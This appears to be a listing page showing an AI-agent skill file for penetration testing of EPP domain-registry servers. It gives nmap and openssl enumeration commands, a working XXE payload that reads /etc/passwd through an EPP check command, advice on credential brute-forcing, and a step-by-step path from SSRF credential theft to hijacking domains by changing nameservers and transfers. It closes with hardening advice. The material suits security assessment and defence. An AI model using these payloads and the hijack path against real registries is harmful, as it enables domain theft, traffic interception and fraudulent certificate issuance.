OpenSkillIndex← back to search

Hacktricks-skills epp-pentesting

Pentest EPP (Extensible Provisioning Protocol) servers used for domain name management. Use this skill whenever the user mentions EPP, domain registrar testing, port 700, TLD security, registry vulnerabilities, or wants to assess domain name system infrastructure. This skill covers enumeration, XXE/SSRF exploitation, mTLS bypass testing, and domain hijacking attack paths.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/700-pentesting-epp/SKILL.MD
source content

EPP Pentesting Skill

A comprehensive guide for security testing of Extensible Provisioning Protocol (EPP) servers used by domain name registries and registrars.

What is EPP?

The Extensible Provisioning Protocol (EPP) is a network protocol used for management of domain names and other internet resources by domain name registries and registrars. It enables automation of domain name registration, renewal, transfer, and deletion processes.

Key characteristics:

  • Typically listens on TCP port 700 over TLS
  • Uses XML for communication (XXE vulnerability surface)
  • Often implements mutual-TLS (mTLS) for client authentication
  • Used by TLD registrars to communicate with domain registrars

Enumeration & Reconnaissance

Step 1: Discover EPP Endpoints

EPP servers are often hidden behind generic hostnames like 

ot&e.<tld>.nic.<cc>
. Start with port scanning:

# Scan for EPP port
nmap -p700 <target>

# Banner-grabbing and TLS inspection
nmap -p700 --script ssl-cert,ssl-enum-ciphers <target>

Step 2: Check mTLS Requirements

Many private test or pre-production deployments forget to enforce mTLS:

# Check if mTLS is really required (it frequently is not!)
openssl s_client -connect <target>:700 -quiet \
  -servername epp.test 2>/dev/null | head

If the server does not terminate the connection after the TLS handshake, you can attempt to send an unauthenticated 

<hello/>
message:

<?xml version="1.0" encoding="UTF-8"?>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
  <hello/>
</epp>

Step 3: Use Automated Tools

Recommended open-source clients:

  1. epp-client (Go) – Actively maintained, supports TCP/TLS and EPP-over-HTTPS (RFC 8730):

    go install github.com/domainr/epp/cmd/epp@latest

  2. gandi/go-epp – Minimal client library for fuzzing or nuclei-style workflows

  3. afq984/php-epp-client – PHP implementation used by many small registrars

Common Vulnerabilities (2023-2025)

YearComponentCWEImpact
2023CoCCA Registry < 3.5CWE-611 XXERemote file read & SSRF via crafted 
<epp>
payload
2024FRED EPP Server 2.xCWE-322 Insufficient TLS cert validationBypass of mTLS allowed unauthorized registrar login
2025Proprietary registrar panelCWE-306 Missing Authentication for Critical FunctionDomain transfer approval endpoint exposed over EPP-HTTP bridge

XXE / SSRF Exploitation

EPP uses XML, making it vulnerable to XXE when parsers are misconfigured. This payload works against many Java/Spring implementations:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
  <command>
    <check>
      <domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
        <domain:name>&xxe;</domain:name>
      </domain:check>
    </check>
  </command>
</epp>

When the parser is misconfigured (

XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true
), the file content is returned inside the 
<resData>
structure.

Other Typical Findings

  1. Weak credential policy – EPP login passphrases shorter than 8 characters; brute-force is often feasible because the spec only RECOMMENDS (not requires) rate-limiting

  2. Missing 

    registryLock
    / 
    serverUpdateProhibited
    status     – Once authenticated, attackers can immediately update NS records and steal traffic

  3. Unsigned poll messages – Some implementations still do not sign poll Q&A messages, enabling spoofing/phishing of registrar operators

Attack Path: From Zero to TLD Hijack

Follow this methodology for comprehensive EPP assessment:

  1. Discover an EPP endpoint (often hidden behind a generic host like 

    ot&e.<tld>.nic.<cc>
    )

  2. Abuse weaknesses to gain registrar-level credentials:

    • XXE → SSRF to IMDSv1, credential exfiltration
    • TLS-bypass if mTLS is not enforced
    • Brute-force weak credentials

  3. Issue 

    <update>
    requests to change the domain's 
    hostObj
    records to attacker-controlled name servers

  4. Submit 

    <transfer>
    to move the domain to an attacker-controlled registrar – many registries still rely on a single auth-code

  5. Profit: Full control of DNS zone, ability to request TLS certificates via ACME

Defensive Measures & Hardening

When providing remediation guidance, recommend:

  • Enforce mTLS with per-registrar client certificates and pin the registry CA
  • Set 
    parserFeature secure-processing=true
     or equivalent to kill XXE
  • Run continuous fuzzing of the XML parser (e.g., with 
    go-fuzz
    or 
    jazzer
    for Java)
  • Deploy Registry Lock / server*Prohibited statuses for high-value domains
  • Monitor 
    poll
    queue     for suspicious 
    <transfer>
    or 
    <update>
    commands and alert in real-time
  • Leverage ICANN 2024 DNS-Abuse contract amendments requiring registries to prove rate-limit & auth controls

References

  • ICANN Security and Stability Advisory Committee (SSAC). "SAC118: Consequences of Registry Operator Failure to Implement EPP Security Controls". 2024.
  • HackCompute – "Hacking EPP servers: abusing XXE to hijack TLDs" (2023).
  • RFC 5730 – Extensible Provisioning Protocol (EPP)
  • RFC 8730 – EPP over HTTPS

Scripts

Use the bundled scripts for common tasks:

  • scripts/epp-enumerate.sh
    – Banner grabbing and TLS inspection
  • scripts/epp-xxe-test.sh
    – Test for XXE vulnerabilities
  • scripts/epp-login-test.go
    – Minimal login+check script for testing authentication